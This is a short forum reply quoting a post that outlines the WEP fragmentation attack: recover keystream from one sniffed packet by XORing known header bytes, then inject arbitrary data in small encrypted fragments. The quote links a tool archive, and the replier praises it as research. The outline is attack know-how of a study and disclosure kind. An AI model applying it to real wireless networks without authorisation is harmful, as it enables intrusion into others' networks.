Quote:
|
Originally Posted by sorbo
It is possible to send arbitrary data [any length and content] on a WEP network after having eavesdropped a single data packet.
http://darkircop.org/frag-0.1.tgz
The idea is:
Sniff first 8 bytes of cipher-text on packet with IV X.
XOR cipher-text with 8 bytes of clear-text:
AA AA 03 00 00 00 08 {00/06} depending if IP/ARP.
Send data in 802.11 fragments of 4 data bytes + 4 CRC32 bytes all encrypted using the PRGA recovered and with IV X. |
Great work sorbo, lotsa information presented in a wellwritten researchpaper.
And damn you too - I want to play with this, but have to little time for new projects.
Could somebody please invent a TimeAddingMachine. Just 1 additional hour a day would be helpfull
Dutch